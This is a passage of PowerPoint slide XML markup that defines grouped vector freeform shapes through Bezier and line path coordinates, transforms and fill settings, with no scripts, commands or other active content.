                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="12" y="15"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="45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830"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3141" y="695"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 42 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 39 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="64"/>
                        <a:pt x="20" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="60" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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831"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3141" y="695"/>
                  <a:ext cx="191" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 39 w 81"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 81"/>
                    <a:gd name="T3" fmla="*/ 42 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 81"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 39 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="64"/>
                        <a:pt x="20" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="60" y="0"/>
                        <a:pt x="39" y="1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0" name="Freeform 1832"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3009" y="1333"/>
                  <a:ext cx="69" cy="16"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 69"/>
                    <a:gd name="T1" fmla="*/ 16 h 16"/>
                    <a:gd name="T2" fmla="*/ 69 w 69"/>
                    <a:gd name="T3" fmla="*/ 0 h 16"/>
                    <a:gd name="T4" fmla="*/ 0 w 69"/>
                    <a:gd name="T5" fmla="*/ 16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9" h="16">
                      <a:moveTo>
                        <a:pt x="0" y="16"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="69" y="0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Line 1833"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="-3009" y="1333"/>
                  <a:ext cx="69" cy="1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1834"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3144" y="1316"/>
                  <a:ext cx="22" cy="7"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 22 w 22"/>
                    <a:gd name="T1" fmla="*/ 7 h 7"/>
                    <a:gd name="T2" fmla="*/ 0 w 22"/>
                    <a:gd name="T3" fmla="*/ 0 h 7"/>
                    <a:gd name="T4" fmla="*/ 22 w 22"/>
                    <a:gd name="T5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2" h="7">
                      <a:moveTo>
                        <a:pt x="22" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="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Line 1835"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="-3144" y="1316"/>
                  <a:ext cx="22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7" name="Group 1877"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1420" y="2505"/>
                <a:ext cx="206" cy="195"/>
                <a:chOff x="3116" y="2858"/>
                <a:chExt cx="1343" cy="1285"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="121" name="Freeform 1878"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3116" y="2858"/>
                  <a:ext cx="1343" cy="1285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1343 w 1343"/>
                    <a:gd name="T1" fmla="*/ 362 h 1285"/>
                    <a:gd name="T2" fmla="*/ 1343 w 1343"/>
                    <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                    <a:gd name="T4" fmla="*/ 0 w 1343"/>
                    <a:gd name="T5" fmla="*/ 926 h 1285"/>
                    <a:gd name="T6" fmla="*/ 0 w 1343"/>
                    <a:gd name="T7" fmla="*/ 0 h 1285"/>
                    <a:gd name="T8" fmla="*/ 1343 w 1343"/>
                    <a:gd name="T9" fmla="*/ 362 h 1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3" h="1285">
                      <a:moveTo>
                        <a:pt x="1343" y="362"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1343" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="926"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1343" y="3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" name="Freeform 1879"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3574" y="3253"/>
                  <a:ext cx="363" cy="576"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 79 w 154"/>
                    <a:gd name="T1" fmla="*/ 0 h 244"/>
                    <a:gd name="T2" fmla="*/ 39 w 154"/>
                    <a:gd name="T3" fmla="*/ 100 h 244"/>
                    <a:gd name="T4" fmla="*/ 81 w 154"/>
                    <a:gd name="T5" fmla="*/ 225 h 244"/>
                    <a:gd name="T6" fmla="*/ 79 w 154"/>
                    <a:gd name="T7" fmla="*/ 0 h 2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54" h="244">
                      <a:moveTo>
                        <a:pt x="79" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="0"/>
                        <a:pt x="76" y="40"/>
                        <a:pt x="39" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="163"/>
                        <a:pt x="39" y="212"/>
                        <a:pt x="81" y="225"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="143" y="244"/>
                        <a:pt x="154" y="179"/>
                        <a:pt x="79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880"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1857" y="2562"/>
                <a:ext cx="167" cy="281"/>
                <a:chOff x="3831" y="309"/>
                <a:chExt cx="167" cy="281"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="109" name="Group 1881"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3833" y="393"/>
                  <a:ext cx="153" cy="177"/>
                  <a:chOff x="4132" y="242"/>
                  <a:chExt cx="153" cy="177"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="118" name="Freeform 1882"/>
                  <p:cNvSpPr>
                    <a:spLocks noEditPoints="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4203" y="286"/>
                    <a:ext cx="82" cy="133"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 119 w 123"/>
                      <a:gd name="T1" fmla="*/ 204 h 204"/>
                      <a:gd name="T2" fmla="*/ 117 w 123"/>
                      <a:gd name="T3" fmla="*/ 204 h 204"/>
                      <a:gd name="T4" fmla="*/ 4 w 123"/>
                      <a:gd name="T5" fmla="*/ 173 h 204"/>
                      <a:gd name="T6" fmla="*/ 0 w 123"/>
                      <a:gd name="T7" fmla="*/ 169 h 204"/>
                      <a:gd name="T8" fmla="*/ 0 w 123"/>
                      <a:gd name="T9" fmla="*/ 5 h 204"/>
                      <a:gd name="T10" fmla="*/ 2 w 123"/>
                      <a:gd name="T11" fmla="*/ 1 h 204"/>
                      <a:gd name="T12" fmla="*/ 6 w 123"/>
                      <a:gd name="T13" fmla="*/ 1 h 204"/>
                      <a:gd name="T14" fmla="*/ 120 w 123"/>
                      <a:gd name="T15" fmla="*/ 31 h 204"/>
                      <a:gd name="T16" fmla="*/ 123 w 123"/>
                      <a:gd name="T17" fmla="*/ 36 h 204"/>
                      <a:gd name="T18" fmla="*/ 123 w 123"/>
                      <a:gd name="T19" fmla="*/ 199 h 204"/>
                      <a:gd name="T20" fmla="*/ 122 w 123"/>
                      <a:gd name="T21" fmla="*/ 203 h 204"/>
                      <a:gd name="T22" fmla="*/ 119 w 123"/>
                      <a:gd name="T23" fmla="*/ 204 h 204"/>
                      <a:gd name="T24" fmla="*/ 10 w 123"/>
                      <a:gd name="T25" fmla="*/ 165 h 204"/>
                      <a:gd name="T26" fmla="*/ 114 w 123"/>
                      <a:gd name="T27" fmla="*/ 193 h 204"/>
                      <a:gd name="T28" fmla="*/ 114 w 123"/>
                      <a:gd name="T29" fmla="*/ 39 h 204"/>
                      <a:gd name="T30" fmla="*/ 10 w 123"/>
                      <a:gd name="T31" fmla="*/ 11 h 204"/>
                      <a:gd name="T32" fmla="*/ 10 w 123"/>
                      <a:gd name="T33" fmla="*/ 165 h 2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3" h="204">
                        <a:moveTo>
                          <a:pt x="119" y="204"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="118" y="204"/>
                          <a:pt x="118" y="204"/>
                          <a:pt x="117" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="173"/>
                          <a:pt x="4" y="173"/>
                          <a:pt x="4" y="173"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="173"/>
                          <a:pt x="0" y="171"/>
                          <a:pt x="0" y="169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4"/>
                          <a:pt x="1" y="2"/>
                          <a:pt x="2" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="0"/>
                          <a:pt x="5" y="0"/>
                          <a:pt x="6" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="31"/>
                          <a:pt x="120" y="31"/>
                          <a:pt x="120" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="32"/>
                          <a:pt x="123" y="33"/>
                          <a:pt x="123" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="123" y="199"/>
                          <a:pt x="123" y="199"/>
                          <a:pt x="123" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="123" y="201"/>
                          <a:pt x="123" y="202"/>
                          <a:pt x="122" y="203"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="203"/>
                          <a:pt x="120" y="204"/>
                          <a:pt x="119" y="204"/>
                        </a:cubicBezTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="10" y="165"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="114" y="193"/>
                          <a:pt x="114" y="193"/>
                          <a:pt x="114" y="193"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="114" y="39"/>
                          <a:pt x="114" y="39"/>
                          <a:pt x="114" y="39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165"/>
                          <a:pt x="10" y="165"/>
                          <a:pt x="10" y="16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9" name="Freeform 1883"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4132" y="319"/>
                    <a:ext cx="151" cy="40"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 539"/>
                      <a:gd name="T1" fmla="*/ 70 h 144"/>
                      <a:gd name="T2" fmla="*/ 269 w 539"/>
                      <a:gd name="T3" fmla="*/ 0 h 144"/>
                      <a:gd name="T4" fmla="*/ 539 w 539"/>
                      <a:gd name="T5" fmla="*/ 70 h 144"/>
                      <a:gd name="T6" fmla="*/ 269 w 539"/>
                      <a:gd name="T7" fmla="*/ 144 h 144"/>
                      <a:gd name="T8" fmla="*/ 0 w 539"/>
                      <a:gd name="T9" fmla="*/ 70 h 1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9" h="144">
                        <a:moveTo>
                          <a:pt x="0" y="70"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="269" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="539" y="70"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="269" y="144"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="7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0" name="Freeform 1884"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="4133" y="242"/>
                    <a:ext cx="75" cy="97"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 267"/>
                      <a:gd name="T1" fmla="*/ 349 h 349"/>
                      <a:gd name="T2" fmla="*/ 0 w 267"/>
                      <a:gd name="T3" fmla="*/ 71 h 349"/>
                      <a:gd name="T4" fmla="*/ 267 w 267"/>
                      <a:gd name="T5" fmla="*/ 0 h 349"/>
                      <a:gd name="T6" fmla="*/ 267 w 267"/>
                      <a:gd name="T7" fmla="*/ 279 h 349"/>
                      <a:gd name="T8" fmla="*/ 0 w 267"/>
                      <a:gd name="T9" fmla="*/ 349 h 3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67" h="349">
                        <a:moveTo>
                          <a:pt x="0" y="349"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="267" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="267" y="279"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="349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0" name="Group 1885"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3841" y="309"/>
                  <a:ext cx="157" cy="269"/>
                  <a:chOff x="3515" y="-1153"/>
                  <a:chExt cx="558" cy="954"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="112" name="Freeform 1886"/>
                  <p:cNvSpPr>
                    <a:spLocks noEditPoints="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3515" y="-997"/>
                    <a:ext cx="558" cy="439"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 236"/>
                      <a:gd name="T1" fmla="*/ 124 h 186"/>
                      <a:gd name="T2" fmla="*/ 4 w 236"/>
                      <a:gd name="T3" fmla="*/ 145 h 186"/>
                      <a:gd name="T4" fmla="*/ 17 w 236"/>
                      <a:gd name="T5" fmla="*/ 154 h 186"/>
                      <a:gd name="T6" fmla="*/ 20 w 236"/>
                      <a:gd name="T7" fmla="*/ 155 h 186"/>
                      <a:gd name="T8" fmla="*/ 40 w 236"/>
                      <a:gd name="T9" fmla="*/ 160 h 186"/>
                      <a:gd name="T10" fmla="*/ 40 w 236"/>
                      <a:gd name="T11" fmla="*/ 165 h 186"/>
                      <a:gd name="T12" fmla="*/ 67 w 236"/>
                      <a:gd name="T13" fmla="*/ 184 h 186"/>
                      <a:gd name="T14" fmla="*/ 118 w 236"/>
                      <a:gd name="T15" fmla="*/ 170 h 186"/>
                      <a:gd name="T16" fmla="*/ 127 w 236"/>
                      <a:gd name="T17" fmla="*/ 159 h 186"/>
                      <a:gd name="T18" fmla="*/ 126 w 236"/>
                      <a:gd name="T19" fmla="*/ 47 h 186"/>
                      <a:gd name="T20" fmla="*/ 132 w 236"/>
                      <a:gd name="T21" fmla="*/ 92 h 186"/>
                      <a:gd name="T22" fmla="*/ 132 w 236"/>
                      <a:gd name="T23" fmla="*/ 92 h 186"/>
                      <a:gd name="T24" fmla="*/ 137 w 236"/>
                      <a:gd name="T25" fmla="*/ 112 h 186"/>
                      <a:gd name="T26" fmla="*/ 150 w 236"/>
                      <a:gd name="T27" fmla="*/ 120 h 186"/>
                      <a:gd name="T28" fmla="*/ 156 w 236"/>
                      <a:gd name="T29" fmla="*/ 121 h 186"/>
                      <a:gd name="T30" fmla="*/ 156 w 236"/>
                      <a:gd name="T31" fmla="*/ 122 h 186"/>
                      <a:gd name="T32" fmla="*/ 210 w 236"/>
                      <a:gd name="T33" fmla="*/ 135 h 186"/>
                      <a:gd name="T34" fmla="*/ 215 w 236"/>
                      <a:gd name="T35" fmla="*/ 104 h 186"/>
                      <a:gd name="T36" fmla="*/ 164 w 236"/>
                      <a:gd name="T37" fmla="*/ 90 h 186"/>
                      <a:gd name="T38" fmla="*/ 163 w 236"/>
                      <a:gd name="T39" fmla="*/ 85 h 186"/>
                      <a:gd name="T40" fmla="*/ 163 w 236"/>
                      <a:gd name="T41" fmla="*/ 85 h 186"/>
                      <a:gd name="T42" fmla="*/ 150 w 236"/>
                      <a:gd name="T43" fmla="*/ 11 h 186"/>
                      <a:gd name="T44" fmla="*/ 120 w 236"/>
                      <a:gd name="T45" fmla="*/ 1 h 186"/>
                      <a:gd name="T46" fmla="*/ 80 w 236"/>
                      <a:gd name="T47" fmla="*/ 12 h 186"/>
                      <a:gd name="T48" fmla="*/ 37 w 236"/>
                      <a:gd name="T49" fmla="*/ 24 h 186"/>
                      <a:gd name="T50" fmla="*/ 11 w 236"/>
                      <a:gd name="T51" fmla="*/ 49 h 186"/>
                      <a:gd name="T52" fmla="*/ 1 w 236"/>
                      <a:gd name="T53" fmla="*/ 113 h 186"/>
                      <a:gd name="T54" fmla="*/ 1 w 236"/>
                      <a:gd name="T55" fmla="*/ 113 h 186"/>
                      <a:gd name="T56" fmla="*/ 0 w 236"/>
                      <a:gd name="T57" fmla="*/ 124 h 186"/>
                      <a:gd name="T58" fmla="*/ 44 w 236"/>
                      <a:gd name="T59" fmla="*/ 70 h 186"/>
                      <a:gd name="T60" fmla="*/ 43 w 236"/>
                      <a:gd name="T61" fmla="*/ 75 h 186"/>
                      <a:gd name="T62" fmla="*/ 42 w 236"/>
                      <a:gd name="T63" fmla="*/ 87 h 186"/>
                      <a:gd name="T64" fmla="*/ 40 w 236"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 36 w 236"/>
                      <a:gd name="T67" fmla="*/ 122 h 186"/>
                      <a:gd name="T68" fmla="*/ 42 w 236"/>
                      <a:gd name="T69" fmla="*/ 87 h 186"/>
                      <a:gd name="T70" fmla="*/ 43 w 236"/>
                      <a:gd name="T71" fmla="*/ 75 h 186"/>
                      <a:gd name="T72" fmla="*/ 44 w 236"/>
                      <a:gd name="T73" fmla="*/ 70 h 1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36" h="186">
                        <a:moveTo>
                          <a:pt x="0" y="124"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="141"/>
                          <a:pt x="4" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="150"/>
                          <a:pt x="11" y="152"/>
                          <a:pt x="17" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="154"/>
                          <a:pt x="19" y="154"/>
                          <a:pt x="20" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="156"/>
                          <a:pt x="34" y="158"/>
                          <a:pt x="40" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="161"/>
                          <a:pt x="40" y="163"/>
                          <a:pt x="40" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="176"/>
                          <a:pt x="59" y="186"/>
                          <a:pt x="67" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="183"/>
                          <a:pt x="105" y="173"/>
                          <a:pt x="118" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="169"/>
                          <a:pt x="126" y="164"/>
                          <a:pt x="127" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="127" y="117"/>
                          <a:pt x="126" y="53"/>
                          <a:pt x="126" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="126" y="43"/>
                          <a:pt x="129" y="65"/>
                          <a:pt x="132" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="132" y="92"/>
                          <a:pt x="132" y="92"/>
                          <a:pt x="132" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="132" y="102"/>
                          <a:pt x="134" y="108"/>
                          <a:pt x="137" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="116"/>
                          <a:pt x="144" y="118"/>
                          <a:pt x="150" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="121"/>
                          <a:pt x="156" y="121"/>
                          <a:pt x="156" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="122"/>
                          <a:pt x="156" y="122"/>
                          <a:pt x="156" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="181" y="128"/>
                          <a:pt x="205" y="135"/>
                          <a:pt x="210" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="227" y="136"/>
                          <a:pt x="236" y="108"/>
                          <a:pt x="215" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="102"/>
                          <a:pt x="187" y="95"/>
                          <a:pt x="164" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="163" y="85"/>
                          <a:pt x="163" y="85"/>
                          <a:pt x="163" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="163" y="85"/>
                          <a:pt x="163" y="85"/>
                          <a:pt x="163" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="157" y="49"/>
                          <a:pt x="151" y="14"/>
                          <a:pt x="150" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="147" y="3"/>
                          <a:pt x="129" y="0"/>
                          <a:pt x="120" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="111" y="3"/>
                          <a:pt x="91" y="9"/>
                          <a:pt x="80" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="16"/>
                          <a:pt x="44" y="21"/>
                          <a:pt x="37" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="26"/>
                          <a:pt x="14" y="32"/>
                          <a:pt x="11" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="57"/>
                          <a:pt x="6" y="84"/>
                          <a:pt x="1" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="113"/>
                          <a:pt x="1" y="113"/>
                          <a:pt x="1" y="113"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="0" y="124"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="44" y="70"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="72"/>
                          <a:pt x="44" y="73"/>
                          <a:pt x="43" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="78"/>
                          <a:pt x="43" y="82"/>
                          <a:pt x="42" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="99"/>
                          <a:pt x="40" y="111"/>
                          <a:pt x="40" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="123"/>
                          <a:pt x="37" y="123"/>
                          <a:pt x="36" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="108"/>
                          <a:pt x="40" y="96"/>
                          <a:pt x="42" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="83"/>
                          <a:pt x="43" y="78"/>
                          <a:pt x="43" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="73"/>
                          <a:pt x="44" y="71"/>
                          <a:pt x="44" y="70"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF00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3" name="Freeform 1887"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3638" y="-1026"/>
                    <a:ext cx="156" cy="97"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 36 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 56 w 66"/>
